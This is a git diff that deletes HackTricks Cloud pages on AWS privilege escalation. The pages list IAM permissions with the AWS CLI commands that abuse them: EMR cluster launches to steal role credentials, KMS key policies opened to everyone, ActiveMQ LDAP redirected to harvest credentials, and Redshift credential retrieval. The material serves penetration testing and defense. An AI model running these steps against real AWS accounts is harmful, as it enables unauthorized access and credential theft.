- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md deleted file mode 100644 index acad83823..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md +++ /dev/null @@ -1,92 +0,0 @@ -# AWS - EMR Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EMR - -More **info about EMR** in: - -{% content-ref url="../aws-services/aws-emr-enum.md" %} -[aws-emr-enum.md](../aws-services/aws-emr-enum.md) -{% endcontent-ref %} - -### `iam:PassRole`, `elasticmapreduce:RunJobFlow` - -An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ -Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). - -```bash -# Import EC2 ssh key (you will need extra permissions for this) -ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" -chmod 400 /tmp/sshkey -base64 /tmp/sshkey.pub > /tmp/pub.key -aws ec2 import-key-pair \ - --key-name "privesc" \ - --public-key-material file:///tmp/pub.key - - -aws emr create-cluster \ - --release-label emr-5.15.0 \ - --instance-type m4.large \ - --instance-count 1 \ - --service-role EMR_DefaultRole \ - --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc - -# Wait 1min and connect via ssh to an EC2 instance of the cluster) -aws emr describe-cluster --cluster-id -# In MasterPublicDnsName you can find the DNS to connect to the master instance -## You cna also get this info listing EC2 instances -``` - -Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. - -**Potential Impact:** Privesc to the EC2 service role specified. - -### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` - -With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. - -{% hint style="danger" %} -Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. -{% endhint %} - -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile - -### `elasticmapreduce:OpenEditorInConsole` - -Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ -The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` - -{% hint style="danger" %} -Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related`.` -{% endhint %} - -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md deleted file mode 100644 index 77979f805..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - Gamelift - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### `gamelift:RequestUploadCredentials` - -With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. - -```bash -aws gamelift request-upload-credentials \ - --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 -``` - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md deleted file mode 100644 index ccd34ffa8..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md +++ /dev/null @@ -1,154 +0,0 @@ -# AWS - KMS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For more info about KMS check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) - -With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: - -{% code overflow="wrap" %} -```bash -aws kms list-keys -aws kms list-key-policies --key-id # Although only 1 max per key -aws kms get-key-policy --key-id --policy-name -# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") -aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json -``` -{% endcode %} - -policy.json: - -```json -{ - "Version" : "2012-10-17", - "Id" : "key-consolepolicy-3", - "Statement" : [ - { - "Sid" : "Enable IAM User Permissions", - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : "kms:*", - "Resource" : "*" - }, - { - "Sid" : "Allow all use", - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : [ "kms:*" ], - "Resource" : "*" - } - ] -} -``` - -### `kms:CreateGrant` - -It **allows a principal to use a KMS key:** - -```bash -aws kms create-grant \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ - --operations Decrypt -``` - -{% hint style="warning" %} -A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) -{% endhint %} - -{% hint style="warning" %} -Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\ -However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ -For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). -{% endhint %} - -```bash -# Use the grant token in a request -aws kms generate-data-key \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - –-key-spec AES_256 \ - --grant-tokens $token -``` - -Note that it's possible to list grant of keys with: - -```bash -aws kms list-grants --key-id -``` - -### `kms:CreateKey`, `kms:ReplicateKey` - -With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. - -So, an attacker could abuse this to obtain privesc his access to the key and use it - -{% code overflow="wrap" %} -```bash -aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml - -{ - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "kms:*", - "Resource": "*" - } - ] -} -``` -{% endcode %} - -### `kms:Decrypt` - -This permission allows to use a key to decrypt some information.\ -For more information check: - -{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md deleted file mode 100644 index 3156ba72e..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - Mediapackage Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### `mediapackage:RotateChannelCredentials` - -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - -```bash -aws mediapackage rotate-channel-credentials --id -``` - -### `mediapackage:RotateIngestEndpointCredentials` - -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - -{% code overflow="wrap" %} -```bash -aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 -``` -{% endcode %} - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md deleted file mode 100644 index 3532b180a..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md +++ /dev/null @@ -1,79 +0,0 @@ -# AWS - MQ Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## MQ - -For more information about MQ check: - -{% content-ref url="../aws-services/aws-mq-enum.md" %} -[aws-mq-enum.md](../aws-services/aws-mq-enum.md) -{% endcontent-ref %} - -### `mq:ListBrokers`, `mq:CreateUser` - -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - -{% code overflow="wrap" %} -```bash -aws mq list-brokers -aws mq create-user --broker-id --console-access --password --username -``` -{% endcode %} - -**Potential Impact:** Access sensitive info navigating through ActiveMQ - -### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` - -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - -{% code overflow="wrap" %} -```bash -aws mq list-brokers -aws mq list-users --broker-id -aws mq update-user --broker-id --console-access --password --username -``` -{% endcode %} - -**Potential Impact:** Access sensitive info navigating through ActiveMQ - -### `mq:ListBrokers`, `mq:UpdateBroker` - -If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. - -```bash -aws mq list-brokers -aws mq update-broker --broker-id --ldap-server-metadata=... -``` - -If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). - -**Potential Impact:** Steal ActiveMQ credentials - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md deleted file mode 100644 index c5a09cb29..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md +++ /dev/null @@ -1,52 +0,0 @@ -# AWS - MSK Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## MSK - -For more information about MSK (Kafka) check: - -{% content-ref url="../aws-services/aws-msk-enum.md" %} -[aws-msk-enum.md](../aws-services/aws-msk-enum.md) -{% endcontent-ref %} - -### `msk:ListClusters`, `msk:UpdateSecurity` - -With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. - -{% code overflow="wrap" %} -```bash -aws msk --client-authentication --cluster-arn --current-version -``` -{% endcode %} - -You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ -If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md deleted file mode 100644 index 89b2282f2..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - Organizations Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Organizations - -For more information check: - -{% content-ref url="../aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) -{% endcontent-ref %} - -## From management Account to children accounts - -If you compromise the root/management account, chances are you can compromise all the children accounts.\ -To [**learn how check this page**](../#compromising-the-organization). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md deleted file mode 100644 index e5098c244..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md +++ /dev/null @@ -1,135 +0,0 @@ -# AWS - Redshift Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Redshift - -For more information about RDS check: - -{% content-ref url="../aws-services/aws-redshift-enum.md" %} -[aws-redshift-enum.md](../aws-services/aws-redshift-enum.md) -{% endcontent-ref %} - -### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` - -With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: - -```bash -# Get creds -aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 -# Connect, even if the password is a base64 string, that is the password -psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 -``` - -**Potential Impact:** Find sensitive info inside the databases. - -### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` - -With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ -Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. - -```bash -# Get creds -aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 -# Connect, even if the password is a base64 string, that is the password -psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 -``` - -**Potential Impact:** Find sensitive info inside the databases. - -### `redshift:DescribeClusters`, `redshift:ModifyCluster?` - -It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): - -``` -aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; -``` - -**Potential Impact:** Find sensitive info inside the databases. - -## Accessing External Services - -{% hint style="warning" %} -To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. - -Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` -{% endhint %} - -### Lambdas - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r\_CREATE\_EXTERNAL\_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: - -```sql -CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) -RETURNS INT -STABLE -LAMBDA 'lambda_function' -IAM_ROLE default; -``` - -### S3 - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: - -```sql -# Read -copy table from 's3:///load/key_prefix' -credentials 'aws_iam_role=arn:aws:iam:::role/' -region '' -options; - -# Write -unload ('select * from venue') -to 's3://mybucket/tickit/unload/venue_' -iam_role default; -``` - -### Dynamo - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t\_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: - -```sql -copy favoritemovies -from 'dynamodb://ProductCatalog' -iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; -``` - -{% hint style="warning" %} -The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. -{% endhint %} - -### EMR - -Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md deleted file mode 100644 index 8be266ddb..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md +++ /dev/null @@ -1,75 +0,0 @@ -# AWS - Secrets Manager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
